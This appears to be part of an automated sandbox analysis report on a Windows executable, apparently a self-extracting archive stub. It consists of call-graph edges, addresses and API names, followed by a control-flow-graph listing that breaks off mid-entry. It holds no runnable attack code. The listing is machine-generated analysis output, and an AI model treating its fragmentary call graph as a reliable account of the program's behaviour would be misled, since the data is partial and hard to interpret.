7ff75fbbc140 20217->20219 20218->20219 20220 7ff75fbbdedc memcpy_s 15 API calls 20218->20220 20219->20191 20219->20192 20220->20221 20221->20217 20223 7ff75fba2114 20222->20223 20245 7ff75fb918f8 20223->20245 20225 7ff75fba2120 wcscpy 20225->19911 20227 7ff75fba20e8 20226->20227 20228 7ff75fb918f8 75 API calls 20227->20228 20229 7ff75fba2120 wcscpy 20228->20229 20229->19913 20281 7ff75fb9e1c4 20230->20281 20232 7ff75fb988dd 20287 7ff75fbb38a0 20232->20287 20234 7ff75fb98900 20296 7ff75fba7470 20234->20296 20237 7ff75fb989f0 20239 7ff75fb98a00 _snwprintf 20237->20239 20240 7ff75fb98a7c 20239->20240 20322 7ff75fb9b770 20239->20322 20243 7ff75fb98ae0 20240->20243 20328 7ff75fb99140 20240->20328 20241 7ff75fb98b2c 20241->19917 20243->20241 20244 7ff75fb9144c 71 API calls 20243->20244 20244->20241 20246 7ff75fb9191f 20245->20246 20255 7ff75fb9198f memcpy_s 20245->20255 20247 7ff75fb9194c 20246->20247 20256 7ff75fb97660 20246->20256 20251 7ff75fb919bf 20247->20251 20252 7ff75fb91973 20247->20252 20253 7ff75fb97720 73 API calls 20251->20253 20251->20255 20254 7ff75fb97720 73 API calls 20252->20254 20252->20255 20253->20255 20254->20255 20255->20225 20257 7ff75fb97688 _snwprintf 20256->20257 20258 7ff75fbba818 swprintf 46 API calls 20257->20258 20259 7ff75fb976a9 20258->20259 20260 7ff75fb9144c 71 API calls 20259->20260 20261 7ff75fb976b8 20260->20261 20262 7ff75fb978cc 73 API calls 20261->20262 20263 7ff75fb91940 20262->20263 20264 7ff75fb97720 20263->20264 20269 7ff75fb97758 20264->20269 20266 7ff75fb9772e 20272 7ff75fbb58d4 20266->20272 20268 7ff75fb97754 20277 7ff75fb94568 20269->20277 20273 7ff75fbb5910 RtlPcToFileHeader 20272->20273 20274 7ff75fbb58f3 20272->20274 20275 7ff75fbb5937 RaiseException 20273->20275 20276 7ff75fbb5928 20273->20276 20274->20273 20275->20268 20276->20275 20278 7ff75fb945a6 memcpy_s 20277->20278 20279 7ff75fba3334 71 API calls 20278->20279 20280 7ff75fb945c7 20279->20280 20280->20266 20282 7ff75fb9e1e2 20281->20282 20283 7ff75fbb38a0 4 API calls 20282->20283 20285 7ff75fb9e207 20283->20285 20284 7ff75fbb38a0 4 API calls 20286 7ff75fb9e231 20284->20286 20285->20284 20286->20232 20290 7ff75fbb38ab 20287->20290 20288 7ff75fbb38c4 20288->20234 20289 7ff75fbbc50c abort 2 API calls 20289->20290 20290->20288 20290->20289 20291 7ff75fbb38ca 20290->20291 20292 7ff75fbb38d5 20291->20292 20301 7ff75fbb3ffc 20291->20301 20305 7ff75fbb401c 20292->20305 20297 7ff75fbb38a0 4 API calls 20296->20297 20298 7ff75fba7490 20297->20298 20300 7ff75fb9892e 20298->20300 20309 7ff75fba2a9c 20298->20309 20300->20237 20302 7ff75fbb400a std::bad_alloc::bad_alloc 20301->20302 20303 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20302->20303 20304 7ff75fbb401b 20303->20304 20306 7ff75fbb402a std::bad_alloc::bad_alloc 20305->20306 20307 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20306->20307 20308 7ff75fbb403b 20307->20308 20310 7ff75fba2ab4 InitializeCriticalSection CreateSemaphoreW CreateEventW 20309->20310 20312 7ff75fba2b27 20310->20312 20313 7ff75fb97660 73 API calls 20312->20313 20314 7ff75fba2b50 20312->20314 20315 7ff75fba2b3f 20313->20315 20314->20300 20317 7ff75fb97658 20315->20317 20319 7ff75fb9797c 20317->20319 20318 7ff75fb97992 20318->20314 20319->20318 20320 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20319->20320 20321 7ff75fb979b2 20320->20321 20323 7ff75fb9b78c 20322->20323 20324 7ff75fb9b7c0 20323->20324 20350 7ff75fb9b8f8 20323->20350 20324->20239 20326 7ff75fb9b79f 20326->20324 20327 7ff75fb9b7a5 FindClose 20326->20327 20327->20324 20329 7ff75fb99161 _snwprintf 20328->20329 20361 7ff75fb914f8 20329->20361 20331 7ff75fb99177 20332 7ff75fb99187 20331->20332 20369 7ff75fb9b05c 20331->20369 20336 7ff75fb991c0 20332->20336 20374 7ff75fb91b84 20332->20374 20512 7ff75fb9173c 20336->20512 20338 7ff75fb991bc 20338->20336 20345 7ff75fb9b770 7 API calls 20338->20345 20348 7ff75fb9925a 20338->20348 20521 7ff75fb9d25c 20338->20521 20340 7ff75fb99270 20342 7ff75fb992b2 20340->20342 20406 7ff75fba38fc 20340->20406 20414 7ff75fb92178 20342->20414 20345->20338 20346 7ff75fb992be 20346->20336 20418 7ff75fb93fc8 20346->20418 20429 7ff75fb99378 20346->20429 20402 7ff75fb99310 20348->20402 20351 7ff75fb9b91d _snwprintf 20350->20351 20352 7ff75fb9b9a4 FindNextFileW 20351->20352 20353 7ff75fb9b93a FindFirstFileW 20351->20353 20354 7ff75fb9b98e 20352->20354 20355 7ff75fb9b9ae GetLastError 20352->20355 20353->20354 20356 7ff75fb9b94c 20353->20356 20354->20326 20355->20354 20357 7ff75fb9cbcc GetCurrentDirectoryW 20356->20357 20358 7ff75fb9b95e 20357->20358 20359 7ff75fb9b962 FindFirstFileW 20358->20359 20360 7ff75fb9b97d GetLastError 20358->20360 20359->20354 20359->20360 20360->20354 20362 7ff75fb91517 20361->20362 20363 7ff75fb9e1c4 4 API calls 20362->20363 20364 7ff75fb9153b 20363->20364 20365 7ff75fbb38a0 4 API calls 20364->20365 20368 7ff75fb915e9 memcpy_s 20364->20368 20366 7ff75fb915d7 20365->20366 20366->20368 20527 7ff75fb9c4d4 20366->20527 20368->20331 20540 7ff75fb9a990 20369->20540 20370 7ff75fb9b075 20371 7ff75fb9b079 20370->20371 20550 7ff75fb977cc 20370->20550 20371->20332 20564 7ff75fb9ac90 20374->20564 20375 7ff75fb91d5f 20375->20338 20376 7ff75fb91bd1 20376->20375 20378 7ff75fb91bee 20376->20378 20569 7ff75fb914cc 20376->20569 20378->20375 20380 7ff75fb91da4 20378->20380 20381 7ff75fb91d96 20378->20381 20380->20375 20384 7ff75fb93fc8 108 API calls 20380->20384 20385 7ff75fb91e26 20380->20385 20393 7ff75fb9ae50 79 API calls 20380->20393 20382 7ff75fb9144c 71 API calls 20381->20382 20382->20375 20384->20380 20385->20375 20386 7ff75fb9144c 71 API calls 20385->20386 20388 7ff75fb91e5a 20385->20388 20386->20388 20387 7ff75fb91c74 20387->20378 20581 7ff75fb9ae50 20387->20581 20388->20375 20396 7ff75fb9af60 77 API calls 20388->20396 20390 7ff75fb93fc8 108 API calls 20391 7ff75fb91ea8 20390->20391 20391->20390 20392 7ff75fb91f1d 20391->20392 20395 7ff75fb9ae50 79 API calls 20391->20395 20399 7ff75fb9ae50 79 API calls 20392->20399 20393->20380 20394 7ff75fb9ac90 80 API calls 20394->20378 20395->20391 20396->20391 20397 7ff75fb9ac90 80 API calls 20397->20387 20399->20375 20632 7ff75fb9e2e4 20402->20632 20404 7ff75fba315c GetSystemTime SystemTimeToFileTime 20404->20340 20405 7ff75fb99322 20405->20404 20407 7ff75fbb2548 _snwprintf 20406->20407 20408 7ff75fb9fdf8 48 API calls 20407->20408 20409 7ff75fbb257d 20408->20409 20410 7ff75fb945d8 swprintf 46 API calls 20409->20410 20411 7ff75fbb2592 20410->20411 20412 7ff75fbb1890 16 API calls 20411->20412 20413 7ff75fbb259e 20412->20413 20413->20342 20415 7ff75fb9218f 20414->20415 20417 7ff75fb921b1 20414->20417 20636 7ff75fb91b18 20415->20636 20417->20346 20419 7ff75fb93fde 20418->20419 20427 7ff75fb93fda 20418->20427 20428 7ff75fb9af60 77 API calls 20419->20428 20420 7ff75fb93feb 20421 7ff75fb93fff 20420->20421 20422 7ff75fb9400e 20420->20422 20421->20427 20906 7ff75fb936c8 20421->20906 20949 7ff75fb92b40 20422->20949 20427->20346 20428->20420 20430 7ff75fb9939a _snwprintf 20429->20430 20433 7ff75fb993db 20430->20433 20436 7ff75fb99415 20430->20436 21117 7ff75fbac574 20430->21117 20432 7ff75fb993f4 20434 7ff75fb9941f 20432->20434 20435 7ff75fb993f9 20432->20435 20433->20432 20433->20436 20437 7ff75fb99492 20433->20437 20434->20436 20439 7ff75fbac574 110 API calls 20434->20439 20435->20436 21144 7ff75fb98790 20435->21144 20436->20346 20437->20436 21071 7ff75fb96294 20437->21071 20439->20436 20513 7ff75fb9175c 20512->20513 21439 7ff75fb9e264 20513->21439 20522 7ff75fb9d28a 20521->20522 20526 7ff75fb9d2cb 20521->20526 20522->20526 21449 7ff75fba3d70 CompareStringW 20522->21449 20524 7ff75fb9d2b8 20524->20526 21450 7ff75fba3d70 CompareStringW 20524->21450 20526->20338 20528 7ff75fb9c4ed 20527->20528 20531 7ff75fb9c5b8 20528->20531 20532 7ff75fb9c5ce memcpy_s 20531->20532 20535 7ff75fba2dd0 20532->20535 20538 7ff75fba2d84 GetCurrentProcess GetProcessAffinityMask 20535->20538 20539 7ff75fb9c544 20538->20539 20539->20368 20542 7ff75fb9a9a6 _snwprintf 20540->20542 20541 7ff75fb9a9ca CreateFileW 20543 7ff75fb9aa40 GetLastError 20541->20543 20544 7ff75fb9aa9e 20541->20544 20542->20541 20545 7ff75fb9cbcc GetCurrentDirectoryW 20543->20545 20548 7ff75fb9aaf8 20544->20548 20549 7ff75fb9aad1 SetFileTime 20544->20549 20546 7ff75fb9aa5b 20545->20546 20546->20544 20547 7ff75fb9aa5f CreateFileW GetLastError 20546->20547 20547->20544 20548->20370 20549->20548 20551 7ff75fb9777c 20550->20551 20558 7ff75fba2a4c 20551->20558 20559 7ff75fba2a55 20558->20559 20560 7ff75fba2a6f 20559->20560 20561 7ff75fb97658 2 API calls 20559->20561 20562 7ff75fba2a89 SetThreadExecutionState 20560->20562 20563 7ff75fb97658 2 API calls 20560->20563 20561->20560 20563->20562 20565 7ff75fb9acb6 20564->20565 20566 7ff75fb9acbd 20564->20566 20565->20376 20566->20565 20568 7ff75fb9a800 GetStdHandle ReadFile GetLastError GetLastError GetFileType 20566->20568 20586 7ff75fb977d8 20566->20586 20568->20566 20600 7ff75fb91804 20569->20600 20571 7ff75fb914ee 20572 7ff75fb9af60 20571->20572 20573 7ff75fb9af99 20572->20573 20574 7ff75fb9af7d 20572->20574 20575 7ff75fb91c48 20573->20575 20576 7ff75fb9afb1 SetFilePointer 20573->20576 20574->20575 20611 7ff75fb97840 20574->20611 20575->20397 20576->20575 20578 7ff75fb9afce GetLastError 20576->20578 20578->20575 20579 7ff75fb9afd8 20578->20579 20579->20575 20580 7ff75fb97840 75 API calls 20579->20580 20580->20575 20619 7ff75fb9ab80 20581->20619 20584 7ff75fb91d2a 20584->20378 20584->20394 20585 7ff75fb97840 75 API calls 20585->20584 20591 7ff75fb97814 20586->20591 20588 7ff75fb977eb 20589 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20588->20589 20590 7ff75fb97811 20589->20590 20596 7ff75fb92230 20591->20596 20594 7ff75fb978cc 73 API calls 20595 7ff75fb9782f 20594->20595 20595->20588 20597 7ff75fb9227d memcpy_s 20596->20597 20598 7ff75fba3334 71 API calls 20597->20598 20599 7ff75fb922ab 20598->20599 20599->20594 20601 7ff75fb9182b 20600->20601 20610 7ff75fb91897 memcpy_s 20600->20610 20602 7ff75fb91858 20601->20602 20603 7ff75fb97660 73 API calls 20601->20603 20606 7ff75fb918c1 20602->20606 20607 7ff75fb9187b 20602->20607 20604 7ff75fb9184c 20603->20604 20605 7ff75fb97720 73 API calls 20604->20605 20605->20602 20608 7ff75fb97720 73 API calls 20606->20608 20606->20610 20609 7ff75fb97720 73 API calls 20607->20609 20607->20610 20608->20610 20609->20610 20610->20571 20612 7ff75fb9784f 20611->20612 20615 7ff75fb97861 20611->20615 20613 7ff75fb9144c 71 API calls 20612->20613 20614 7ff75fb97859 20613->20614 20616 7ff75fb978cc 73 API calls 20614->20616 20617 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20615->20617 20616->20615 20618 7ff75fb97887 20617->20618 20623 7ff75fb9ab9b _snwprintf 20619->20623 20620 7ff75fb9ac4d SetFilePointer 20621 7ff75fb9abb1 20620->20621 20622 7ff75fb9ac77 GetLastError 20620->20622 20621->20584 20621->20585 20622->20621 20623->20620 20623->20621 20624 7ff75fb9ac33 20623->20624 20626 7ff75fb9a8c8 20623->20626 20624->20620 20627 7ff75fb9a8e7 20626->20627 20630 7ff75fb9ae50 79 API calls 20627->20630 20628 7ff75fb9a900 20631 7ff75fb9af60 77 API calls 20628->20631 20629 7ff75fb9a910 20629->20624 20630->20628 20631->20629 20633 7ff75fb9e2fa 20632->20633 20635 7ff75fb9e302 20632->20635 20634 7ff75fb9a8c8 79 API calls 20633->20634 20634->20635 20635->20405 20637 7ff75fb91b36 20636->20637 20638 7ff75fb91b3a 20636->20638 20637->20417 20642 7ff75fb91a34 20638->20642 20641 7ff75fb9ae50 79 API calls 20641->20637 20643 7ff75fb91a5b 20642->20643 20645 7ff75fb91a96 20642->20645 20644 7ff75fb93fc8 108 API calls 20643->20644 20648 7ff75fb91a7b 20644->20648 20650 7ff75fb94468 20645->20650 20648->20641 20652 7ff75fb94484 20650->20652 20651 7ff75fb93fc8 108 API calls 20651->20652 20652->20651 20653 7ff75fba2a4c 3 API calls 20652->20653 20654 7ff75fb91abd 20652->20654 20653->20652 20654->20648 21072 7ff75fb962c6 21071->21072 21118 7ff75fbac59c _snwprintf 21117->21118 21119 7ff75fbac6a8 21118->21119 21120 7ff75fb92230 71 API calls 21118->21120 21120->21119 21440 7ff75fb9e27d 21439->21440 21445 7ff75fb9bd88 21440->21445 21442 7ff75fb9e2bf 21443 7ff75fb9bd88 84 API calls 21442->21443 21444 7ff75fb9e2cb 21443->21444 21446 7ff75fb9bd9e 21445->21446 21448 7ff75fb9bda6 21445->21448 21447 7ff75fba2b74 84 API calls 21446->21447 21447->21448 21448->21442 21449->20524 21450->20526 21452 7ff75fbae20c 4 API calls 21451->21452 21453 7ff75fbae1ea 21452->21453 21454 7ff75fbae1f9 21453->21454 21455 7ff75fbae244 4 API calls 21453->21455 21454->19923 21454->19924 21455->21454 21456->19930 21458 7ff75fbae25b 21457->21458 21459 7ff75fbae256 21457->21459 21458->19933 21474 7ff75fbae298 GetDC 21459->21474 21462 7ff75fbae223 21461->21462 21463 7ff75fbae21e 21461->21463 21462->19933 21464 7ff75fbae298 4 API calls 21463->21464 21464->21462 21477 7ff75fbae2e8 GetDC GetDeviceCaps ReleaseDC 21465->21477 21467 7ff75fbae4f7 21468 7ff75fbae501 21467->21468 21469 7ff75fbae510 GetObjectW 21467->21469 21478 7ff75fbae778 GetDC 21468->21478 21472 7ff75fbae533 21469->21472 21471 7ff75fbae50b 21471->19936 21472->21471 21473 7ff75fbae701 DeleteObject 21472->21473 21473->21471 21475 7ff75fbae2e1 21474->21475 21476 7ff75fbae2ae GetDeviceCaps GetDeviceCaps ReleaseDC 21474->21476 21475->21458 21476->21475 21477->21467 21479 7ff75fbae7b3 21478->21479 21480 7ff75fbae7bf GetObjectW 21479->21480 21481 7ff75fbae7f6 21480->21481 21482 7ff75fbae87e ReleaseDC 21481->21482 21482->21471 21483->19944 21485 7ff75fb9b05c 82 API calls 21484->21485 21486 7ff75fb921f2 21485->21486 21487 7ff75fb921f6 21486->21487 21488 7ff75fb91b84 108 API calls 21486->21488 21487->19952 21487->19953 21489 7ff75fb92204 21488->21489 21489->21487 21490 7ff75fb9144c 71 API calls 21489->21490 21490->21487 21492 7ff75fba0ba2 memcpy_s 21491->21492 21498 7ff75fba0c54 21492->21498 21505 7ff75fba2320 21492->21505 21495 7ff75fba0ce2 GetCurrentProcessId 21504 7ff75fba0cc3 21495->21504 21496 7ff75fba0c86 21499 7ff75fb97660 73 API calls 21496->21499 21496->21504 21497 7ff75fba0c20 GetProcAddress GetProcAddress 21497->21498 21498->21495 21498->21496 21500 7ff75fba0cae 21499->21500 21501 7ff75fb978cc 73 API calls 21500->21501 21502 7ff75fba0cb6 21501->21502 21503 7ff75fb97658 2 API calls 21502->21503 21503->21504 21504->19966 21506 7ff75fbb3900 _snwprintf 21505->21506 21507 7ff75fba232c GetSystemDirectoryW 21506->21507 21508 7ff75fba0c14 21507->21508 21509 7ff75fba234a 21507->21509 21508->21497 21508->21498 21510 7ff75fba2362 LoadLibraryW 21509->21510 21510->21508 21513 7ff75fbad7eb 21511->21513 21512 7ff75fbad987 21512->19984 21512->19989 21513->21512 21514 7ff75fba3da0 CompareStringW 21513->21514 21514->21513 23380 7ff75fbc0b2c 23381 7ff75fbc0b54 23380->23381 23382 7ff75fbc0b4d 23380->23382 23383 7ff75fbc0b8d 23381->23383 23384 7ff75fbc0b5b 23381->23384 23383->23382 23391 7ff75fbc184c 23383->23391 23385 7ff75fbc05d4 abort 15 API calls 23384->23385 23386 7ff75fbc0b66 23385->23386 23388 7ff75fbbda18 __free_lconv_mon 15 API calls 23386->23388 23388->23382 23389 7ff75fbc0bb8 23390 7ff75fbbda18 __free_lconv_mon 15 API calls 23389->23390 23390->23382 23392 7ff75fbc1854 23391->23392 23393 7ff75fbc1893 23392->23393 23394 7ff75fbc1884 23392->23394 23396 7ff75fbc48c8 32 API calls 23393->23396 23398 7ff75fbc189d 23393->23398 23395 7ff75fbbdedc memcpy_s 15 API calls 23394->23395 23399 7ff75fbc1889 memcpy_s 23395->23399 23396->23398 23397 7ff75fbbdab8 17 API calls 23397->23399 23398->23397 23399->23389 22940 7ff75fbbe440 22941 7ff75fbbe445 22940->22941 22945 7ff75fbbe45a 22940->22945 22946 7ff75fbbe460 22941->22946 22947 7ff75fbbe4a2 22946->22947 22948 7ff75fbbe4aa 22946->22948 22949 7ff75fbbda18 __free_lconv_mon 15 API calls 22947->22949 22950 7ff75fbbda18 __free_lconv_mon 15 API calls 22948->22950 22949->22948 22951 7ff75fbbe4b7 22950->22951 22952 7ff75fbbda18 __free_lconv_mon 15 API calls 22951->22952 22953 7ff75fbbe4c4 22952->22953 22954 7ff75fbbda18 __free_lconv_mon 15 API calls 22953->22954 22955 7ff75fbbe4d1 22954->22955 22956 7ff75fbbda18 __free_lconv_mon 15 API calls 22955->22956 22957 7ff75fbbe4de 22956->22957 22958 7ff75fbbda18 __free_lconv_mon 15 API calls 22957->22958 22959 7ff75fbbe4eb 22958->22959 22960 7ff75fbbda18 __free_lconv_mon 15 API calls 22959->22960 22961 7ff75fbbe4f8 22960->22961 22962 7ff75fbbda18 __free_lconv_mon 15 API calls 22961->22962 22963 7ff75fbbe505 22962->22963 22964 7ff75fbbda18 __free_lconv_mon 15 API calls 22963->22964 22965 7ff75fbbe515 22964->22965 22966 7ff75fbbda18 __free_lconv_mon 15 API calls 22965->22966 22967 7ff75fbbe525 22966->22967 22972 7ff75fbbe244 22967->22972 22986 7ff75fbbff68 EnterCriticalSection 22972->22986 21515 7ff75fbb5d50 21522 7ff75fbb7e5c 21515->21522 21518 7ff75fbb5d5d 21523 7ff75fbb7e64 21522->21523 21525 7ff75fbb7e95 21523->21525 21526 7ff75fbb5d59 21523->21526 21539 7ff75fbb8158 21523->21539 21527 7ff75fbb7ea4 __vcrt_uninitialize_locks DeleteCriticalSection 21525->21527 21526->21518 21528 7ff75fbb5ebc 21526->21528 21527->21526 21554 7ff75fbb802c 21528->21554 21544 7ff75fbb7edc 21539->21544 21542 7ff75fbb81a3 InitializeCriticalSectionAndSpinCount 21543 7ff75fbb8198 21542->21543 21543->21523 21545 7ff75fbb8003 21544->21545 21546 7ff75fbb7f20 __vcrt_InitializeCriticalSectionEx 21544->21546 21545->21542 21545->21543 21546->21545 21547 7ff75fbb7f4e LoadLibraryW 21546->21547 21548 7ff75fbb7fe5 GetProcAddress 21546->21548 21553 7ff75fbb7f91 LoadLibraryExW 21546->21553 21549 7ff75fbb7f6f GetLastError 21547->21549 21550 7ff75fbb7fc5 21547->21550 21548->21545 21552 7ff75fbb7ff6 21548->21552 21549->21546 21550->21548 21551 7ff75fbb7fdc FreeLibrary 21550->21551 21551->21548 21552->21545 21553->21546 21553->21550 21555 7ff75fbb7edc __vcrt_InitializeCriticalSectionEx 5 API calls 21554->21555 21556 7ff75fbb8051 TlsAlloc 21555->21556 21561 7ff75fbb2e4a 21562 7ff75fbb3490 14 API calls 21561->21562 21563 7ff75fbb2e89 21562->21563 21570 7ff75fbc184c 21571 7ff75fbc1854 21570->21571 21572 7ff75fbc1893 21571->21572 21573 7ff75fbc1884 21571->21573 21577 7ff75fbc189d 21572->21577 21591 7ff75fbc48c8 21572->21591 21574 7ff75fbbdedc memcpy_s 15 API calls 21573->21574 21578 7ff75fbc1889 memcpy_s 21574->21578 21579 7ff75fbbdab8 21577->21579 21580 7ff75fbbdad7 21579->21580 21581 7ff75fbbdacd 21579->21581 21583 7ff75fbbdadc 21580->21583 21589 7ff75fbbdae3 abort 21580->21589 21582 7ff75fbbda58 _snwprintf 16 API calls 21581->21582 21586 7ff75fbbdad5 21582->21586 21584 7ff75fbbda18 __free_lconv_mon 15 API calls 21583->21584 21584->21586 21585 7ff75fbbdb22 21587 7ff75fbbdedc memcpy_s 15 API calls 21585->21587 21586->21578 21587->21586 21588 7ff75fbbdb0c HeapReAlloc 21588->21586 21588->21589 21589->21585 21589->21588 21590 7ff75fbbc50c abort 2 API calls 21589->21590 21590->21589 21592 7ff75fbc48d1 21591->21592 21593 7ff75fbc48ea HeapSize 21591->21593 21594 7ff75fbbdedc memcpy_s 15 API calls 21592->21594 21595 7ff75fbc48d6 21594->21595 21596 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 21595->21596 21597 7ff75fbc48e1 21596->21597 21597->21577

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00007FF75FBAF730 Relevance: 98.7, APIs: 45, Strings: 11, Instructions: 671windowfilesleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 78 7ff75fbaf730-7ff75fbaf788 call 7ff75fbb3900 call 7ff75fb913c0 83 7ff75fbb02de 78->83 84 7ff75fbaf78e-7ff75fbaf794 78->84 87 7ff75fbb02e1-7ff75fbb0301 83->87 85 7ff75fbaff4a-7ff75fbaff6a call 7ff75fbb1b0c 84->85 86 7ff75fbaf79a-7ff75fbaf79c 84->86 98 7ff75fbaff7d-7ff75fbaff87 85->98 99 7ff75fbaff6c-7ff75fbaff77 IsDlgButtonChecked 85->99 88 7ff75fbaf7af-7ff75fbaf7b1 86->88 89 7ff75fbaf79e-7ff75fbaf7a4 86->89 88->87 91 7ff75fbaf815-7ff75fbaf81c 89->91 92 7ff75fbaf7a6-7ff75fbaf7a8 89->92 94 7ff75fbaf822-7ff75fbaf829 91->94 95 7ff75fbaf8b6-7ff75fbaf8db GetDlgItemTextW 91->95 96 7ff75fbaf7f1-7ff75fbaf7ff 92->96 97 7ff75fbaf7aa-7ff75fbaf7ad 92->97 94->95 100 7ff75fbaf82f-7ff75fbaf855 call 7ff75fb9fdf8 SetDlgItemTextW 94->100 102 7ff75fbaf905-7ff75fbaf90c 95->102 103 7ff75fbaf8dd-7ff75fbaf8ee 95->103 104 7ff75fbaf801-7ff75fbaf808 96->104 105 7ff75fbaf80e-7ff75fbaf810 96->105 97->88 101 7ff75fbaf7b6-7ff75fbaf7da call 7ff75fb9fdf8 call 7ff75fb912bc 97->101 106 7ff75fbaffa4-7ff75fbb0056 GetDlgItem IsDlgButtonChecked call 7ff75fbae27c GetDlgItem SetDlgItemTextW call 7ff75fbae8b0 call 7ff75fbaee20 98->106 107 7ff75fbaff89-7ff75fbaff9e SendDlgItemMessageW 98->107 99->98 124 7ff75fbaf85b-7ff75fbaf862 100->124 101->83 138 7ff75fbaf7e0-7ff75fbaf7ec 101->138 112 7ff75fbaf90e-7ff75fbaf917 102->112 113 7ff75fbaf91c-7ff75fbaf934 GetDlgItem 102->113 111 7ff75fbaf8f4 103->111 104->83 104->105 114 7ff75fbaf8f7-7ff75fbaf900 EndDialog 105->114 145 7ff75fbb0058-7ff75fbb0068 call 7ff75fbb08e0 106->145 146 7ff75fbb006d-7ff75fbb0074 106->146 107->106 111->114 120 7ff75fbafe78-7ff75fbafe7f 112->120 115 7ff75fbaf936-7ff75fbaf95d IsDlgButtonChecked * 2 113->115 116 7ff75fbaf963-7ff75fbaf973 SetFocus 113->116 114->83 115->116 121 7ff75fbaf975-7ff75fbaf982 call 7ff75fb9fdf8 116->121 122 7ff75fbaf984-7ff75fbaf9a8 call 7ff75fba2090 call 7ff75fbb17cc call 7ff75fb9fdf8 116->122 120->111 125 7ff75fbafe85-7ff75fbafe87 120->125 139 7ff75fbaf9cc-7ff75fbaf9da call 7ff75fbb1890 121->139 162 7ff75fbaf9ad-7ff75fbaf9c5 call 7ff75fb945d8 122->162 124->83 129 7ff75fbaf868-7ff75fbaf86f 124->129 125->111 131 7ff75fbafe8d-7ff75fbafee8 call 7ff75fb9fdf8 SetDlgItemTextW call 7ff75fb9fdf8 call 7ff75fba2090 125->131 129->83 135 7ff75fbaf875-7ff75fbaf889 GetMessageW 129->135 179 7ff75fbaff26-7ff75fbaff45 call 7ff75fb9fdf8 call 7ff75fbae4b4 131->179 180 7ff75fbafeea-7ff75fbafef1 131->180 135->83 141 7ff75fbaf88f-7ff75fbaf89e IsDialogMessageW 135->141 144 7ff75fbb02d5-7ff75fbb02d8 SetDlgItemTextW 138->144 159 7ff75fbaf9e8-7ff75fbaf9ff call 7ff75fb9b1f0 139->159 160 7ff75fbaf9dc-7ff75fbaf9e3 call 7ff75fbb2040 139->160 141->124 147 7ff75fbaf8a0-7ff75fbaf8b4 TranslateMessage DispatchMessageW 141->147 144->83 145->146 153 7ff75fbb0076-7ff75fbb00a3 call 7ff75fb9fdf8 SetDlgItemTextW call 7ff75fb9fdf8 SetDlgItemTextW 146->153 154 7ff75fbb00a9-7ff75fbb00b0 146->154 147->124 153->154 157 7ff75fbb018f-7ff75fbb0196 154->157 158 7ff75fbb00b6-7ff75fbb00c3 call 7ff75fbb08e0 154->158 167 7ff75fbb024f-7ff75fbb0256 157->167 168 7ff75fbb019c-7ff75fbb01a3 157->168 172 7ff75fbb00c8-7ff75fbb00d2 158->172 183 7ff75fbafa01-7ff75fbafa0f GetLastError 159->183 184 7ff75fbafa12-7ff75fbafa23 call 7ff75fbae91c 159->184 160->159 162->139 175 7ff75fbb0263-7ff75fbb026a 167->175 176 7ff75fbb0258-7ff75fbb025d EnableWindow 167->176 168->167 174 7ff75fbb01a9-7ff75fbb01b0 168->174 181 7ff75fbb00d4-7ff75fbb00db 172->181 182 7ff75fbb0109-7ff75fbb010f 172->182 174->167 186 7ff75fbb01b6-7ff75fbb01c3 174->186 187 7ff75fbb028a-7ff75fbb0292 175->187 188 7ff75fbb026c-7ff75fbb0285 call 7ff75fb91374 * 2 175->188 176->175 179->83 180->179 190 7ff75fbafef3-7ff75fbaff21 call 7ff75fbb82c8 call 7ff75fb9fdf8 call 7ff75fb945d8 180->190 181->182 192 7ff75fbb00dd-7ff75fbb0104 call 7ff75fbad9d8 call 7ff75fbb82e4 181->192 195 7ff75fbb0111-7ff75fbb0120 call 7ff75fc01190 182->195 196 7ff75fbb017d-7ff75fbb018a call 7ff75fbb08e0 182->196 183->184 218 7ff75fbafa25-7ff75fbafa31 GetLastError 184->218 219 7ff75fbafa34-7ff75fbafa3c 184->219 197 7ff75fbb01c9-7ff75fbb01cf 186->197 199 7ff75fbb0294-7ff75fbb029b 187->199 200 7ff75fbb02bd-7ff75fbb02c4 187->200 188->187 190->179 192->182 195->196 234 7ff75fbb0122-7ff75fbb0129 195->234 196->157 209 7ff75fbb01d1-7ff75fbb01d8 197->209 210 7ff75fbb01da-7ff75fbb01e0 197->210 199->200 201 7ff75fbb029d-7ff75fbb02ad 199->201 200->83 205 7ff75fbb02c6-7ff75fbb02d3 call 7ff75fb9fdf8 200->205 212 7ff75fbb02af-7ff75fbb02b5 IsDlgButtonChecked 201->212 213 7ff75fbb02b7 call 7ff75fc01150 201->213 205->144 209->210 221 7ff75fbb021e-7ff75fbb0226 209->221 222 7ff75fbb01e2-7ff75fbb01e9 210->222 223 7ff75fbb01ef-7ff75fbb0219 call 7ff75fba204c call 7ff75fb9fdf8 call 7ff75fba204c 210->223 212->200 213->200 218->219 227 7ff75fbafaaa-7ff75fbafaad 219->227 228 7ff75fbafa3e-7ff75fbafa41 219->228 221->197 232 7ff75fbb0228-7ff75fbb024a call 7ff75fbad9d8 221->232 222->223 229 7ff75fbb01eb-7ff75fbb01ed 222->229 223->221 238 7ff75fbafd35-7ff75fbafdaa call 7ff75fb91398 * 2 call 7ff75fb9fdf8 SetDlgItemTextW call 7ff75fb91398 SetDlgItemTextW GetDlgItem 227->238 239 7ff75fbafab3-7ff75fbafab5 227->239 240 7ff75fbafa43-7ff75fbafa87 GetTickCount call 7ff75fb945d8 call 7ff75fb9a568 call 7ff75fb9a698 228->240 241 7ff75fbafabb-7ff75fbafac3 228->241 229->197 232->167 234->196 242 7ff75fbb012b-7ff75fbb0147 call 7ff75fbb08e0 234->242 292 7ff75fbafdd2-7ff75fbafe35 call 7ff75fbb08e0 * 2 call 7ff75fbb1f74 call 7ff75fbb08e0 238->292 293 7ff75fbafdac-7ff75fbafdcc GetWindowLongPtrW SetWindowLongPtrW 238->293 239->241 246 7ff75fbafccc-7ff75fbafd30 call 7ff75fb9fdf8 call 7ff75fb945d8 call 7ff75fb97888 call 7ff75fb9fdf8 call 7ff75fbae4b4 239->246 281 7ff75fbafa89-7ff75fbafa95 GetLastError 240->281 282 